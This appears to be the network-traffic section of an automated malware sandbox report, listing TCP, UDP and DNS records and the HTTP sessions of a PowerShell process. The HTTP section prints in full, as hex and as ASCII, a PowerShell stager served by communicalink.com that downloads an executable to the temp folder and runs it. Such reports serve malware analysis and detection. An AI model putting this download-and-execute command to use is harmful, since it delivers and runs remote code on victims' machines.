Oct 5, 2023 18:48:06.774943113 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.775013924 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.775413036 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.775480986 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.775681973 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.775746107 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.775979996 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.776047945 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.776464939 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.776535988 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.776880026 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.776947021 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.777214050 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.777285099 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.777615070 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.777677059 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.778146982 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.778215885 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.778467894 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.778537035 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.778795958 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.778861046 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.779089928 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.779159069 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.800848961 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.801003933 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.801150084 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.801217079 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.801258087 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.801280975 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.801565886 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.801748037 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.802031040 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.802109957 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.802294970 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.802366972 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.846863985 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.846999884 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.847088099 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.847111940 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.847140074 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.847141981 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.847203016 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.847254038 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.847326040 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.847356081 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.847646952 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.847739935 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.847758055 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.848009109 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.848089933 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.848104000 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.848380089 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.848454952 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.848469019 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.899744034 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.037437916 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.037563086 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.037724018 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.037724018 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.037791967 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.037858009 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.037880898 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.038100004 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.038151979 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.038228035 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.038621902 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.039043903 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.039052963 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.039084911 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.039128065 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.039145947 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.039413929 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.039496899 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.039822102 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.039901972 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.040312052 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.040381908 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.040431023 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.040524006 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.040659904 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.040726900 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.040847063 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.040919065 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.041035891 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.041114092 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.041232109 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.041297913 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.041603088 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.041667938 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.041841030 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.041903973 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.042182922 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.042247057 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.042412043 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.042485952 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.042767048 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.042834044 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.042922974 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.042984009 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.043338060 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.043407917 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.043500900 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.043557882 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.043850899 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.043929100 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.044061899 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.044126034 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.044318914 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.044389009 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.044667959 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.044732094 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.044856071 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.044925928 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.045223951 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.045281887 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.045381069 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.045435905 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.045690060 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.045763969 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.045985937 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.046108007 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.046279907 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.046358109 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.046520948 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.046597958 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.046952009 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.047030926 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.047434092 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.047492981 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.047580004 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.047689915 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.047715902 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.047801018 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.048192024 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.048290968 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.048367023 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.048446894 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.048711061 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.048804045 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.049000978 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.049073935 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.049151897 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.049206018 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.049273968 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.049334049 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.049410105 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.049484968 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.049612045 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.049691916 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.049861908 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.049925089 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.050024986 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.050091982 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.050405979 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.050463915 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.050540924 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.050625086 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.050626040 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.050641060 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.050674915 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.050698042 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.050812006 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.050879002 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.050934076 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.051007986 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.052283049 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.052340031 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.052369118 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.052380085 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.052393913 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.052396059 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.052448988 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.052452087 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.052470922 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.052495003 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.052516937 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.052552938 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.052565098 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.052578926 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.052587032 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.052640915 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.052676916 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.052689075 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.052716970 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.052722931 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.052776098 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.052930117 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.052993059 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.053000927 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.053049088 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.053118944 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.053126097 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.053452015 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.053519011 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.053524971 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.053576946 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.053653955 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.053662062 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.053754091 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.053831100 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.053838015 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.053992033 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.054058075 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.054068089 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.054074049 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.054142952 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.054160118 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.054362059 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.054441929 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.054497957 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.054579973 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.054630995 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.054718971 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.054939032 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.055012941 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.055068970 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.055154085 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.055192947 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.055263042 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.055562019 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.055597067 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.055627108 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.055633068 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.055646896 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.055659056 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:07.055732965 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.056076050 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:07.375693083 CEST	49683	80	192.168.2.4	104.21.75.133

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 5, 2023 18:48:01.957540035 CEST	56961	53	192.168.2.4	1.1.1.1
Oct 5, 2023 18:48:02.114541054 CEST	53	56961	1.1.1.1	192.168.2.4
Oct 5, 2023 18:48:02.831027985 CEST	57085	53	192.168.2.4	1.1.1.1
Oct 5, 2023 18:48:03.160053015 CEST	53	57085	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 5, 2023 18:48:01.957540035 CEST	192.168.2.4	1.1.1.1	0x1d5c	Standard query (0)	communicalink.com	A (IP address)	IN (0x0001)	false
Oct 5, 2023 18:48:02.831027985 CEST	192.168.2.4	1.1.1.1	0xb6b0	Standard query (0)	the.earth.li	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 5, 2023 18:48:02.114541054 CEST	1.1.1.1	192.168.2.4	0x1d5c	No error (0)	communicalink.com	104.21.75.133	A (IP address)	IN (0x0001)	false
Oct 5, 2023 18:48:02.114541054 CEST	1.1.1.1	192.168.2.4	0x1d5c	No error (0)	communicalink.com	172.67.177.73	A (IP address)	IN (0x0001)	false
Oct 5, 2023 18:48:03.160053015 CEST	1.1.1.1	192.168.2.4	0xb6b0	No error (0)	the.earth.li	93.93.131.124	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

the.earth.li

communicalink.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49684	93.93.131.124	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49685	93.93.131.124	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49683	104.21.75.133	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Oct 5, 2023 18:48:02.273109913 CEST	0	OUT	GET /index.php HTTP/1.1 Host: communicalink.com Connection: Keep-Alive
Oct 5, 2023 18:48:02.812376976 CEST	1	IN	HTTP/1.1 200 OK Date: Thu, 05 Oct 2023 16:48:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=y1DvXo3vmV6RQclysSULFNEwzgob4ALgRO%2FjOdeCHQ5dAma0P9BVAdtxgaobc9aMNe6CjuzZihoQT7J%2F6zj%2FjwbQJ8jWjtKie3%2Fsr4GKHyzMcR1lJLXDhf9JnuAzVS9o5Br29w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8117265e9eb12b95-LAX alt-svc: h3=":443"; ma=86400 Data Raw: 63 35 0d 0a 24 70 61 74 68 20 3d 20 24 45 6e 76 3a 74 65 6d 70 2b 27 5c 4f 67 55 70 6a 58 61 59 2e 65 78 65 27 3b 20 24 63 6c 69 65 6e 74 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 3b 20 24 63 6c 69 65 6e 74 2e 64 6f 77 6e 6c 6f 61 64 66 69 6c 65 28 27 68 74 74 70 73 3a 2f 2f 74 68 65 2e 65 61 72 74 68 2e 6c 69 2f 7e 73 67 74 61 74 68 61 6d 2f 70 75 74 74 79 2f 6c 61 74 65 73 74 2f 77 33 32 2f 70 75 74 74 79 2e 65 78 65 27 2c 24 70 61 74 68 29 3b 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 2d 46 69 6c 65 50 61 74 68 20 24 70 61 74 68 20 0d 0a Data Ascii: c5$path = $Env:temp+'\OgUpjXaY.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe',$path); Start-Process -FilePath $path
Oct 5, 2023 18:48:02.812428951 CEST	1	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49684	93.93.131.124	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Direction	Data
2023-10-05 16:48:03 UTC	OUT	GET /~sgtatham/putty/latest/w32/putty.exe HTTP/1.1 Host: the.earth.li Connection: Keep-Alive
2023-10-05 16:48:04 UTC	IN	HTTP/1.1 302 Found Date: Thu, 05 Oct 2023 16:48:04 GMT Server: Apache Location: https://the.earth.li/~sgtatham/putty/0.79/w32/putty.exe Content-Length: 302 Connection: close Content-Type: text/html; charset=iso-8859-1
2023-10-05 16:48:04 UTC	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 2e 65 61 72 74 68 2e 6c 69 2f 7e 73 67 74 61 74 68 61 6d 2f 70 75 74 74 79 2f 30 2e 37 39 2f 77 33 32 2f 70 75 74 74 79 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://the.earth.li/~sgtatham/putty/0.79/w32/putty.exe">here</a>.</p><hr><address>Apache Server at

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49685	93.93.131.124	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-05 16:48:04 UTC	0	OUT	GET /~sgtatham/putty/0.79/w32/putty.exe HTTP/1.1 Host: the.earth.li
2023-10-05 16:48:05 UTC	0	IN	HTTP/1.1 200 OK Date: Thu, 05 Oct 2023 16:48:05 GMT Server: Apache Last-Modified: Sat, 26 Aug 2023 07:50:35 GMT ETag: "16a120-603ceb76f7865" Accept-Ranges: bytes Content-Length: 1483040 Connection: close Content-Type: application/x-msdos-program
2023-10-05 16:48:05 UTC	0	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 08 00 b3 ad e9 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 5a 0c 00 00 ea 09 00 00 00 00 00 26 e8 09 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 16 00 00 04 00 00 1e 23 17 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 68 d0 0f 00 b4 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELdZ&@#@h
